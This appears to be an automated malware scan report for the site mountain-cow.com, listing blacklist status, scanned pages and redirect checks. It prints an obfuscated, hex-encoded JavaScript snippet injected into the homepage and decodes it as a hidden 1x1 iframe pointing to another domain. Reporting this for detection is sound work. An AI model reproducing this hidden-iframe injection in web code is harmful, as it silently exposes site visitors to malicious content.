Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mountain-cow.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mountain-cow.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.mountain-cow.com/ | 200 OK Content-Length: 61614 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x8cc9=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6E\x6F\x77\x73\x70\x6F\x72\x74\x69\x6E\x63\x2E\x63\x6F\x6D\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"]; document[_0x8cc9[1]](_0x8cc9[0]); Decoded script: <iframe src="http://www.snowsportinc.com" width="1" height="1"></iframe> Antivirus reports:
| ||
http://www.mountain-cow.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mountain-cow.com
Result:
GET / HTTP/1.1
Host: mountain-cow.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mountain-cow.com
Referer: http://www.google.com/search?q=mountain-cow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mountain-cow.com
Referer: http://www.google.com/search?q=mountain-cow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.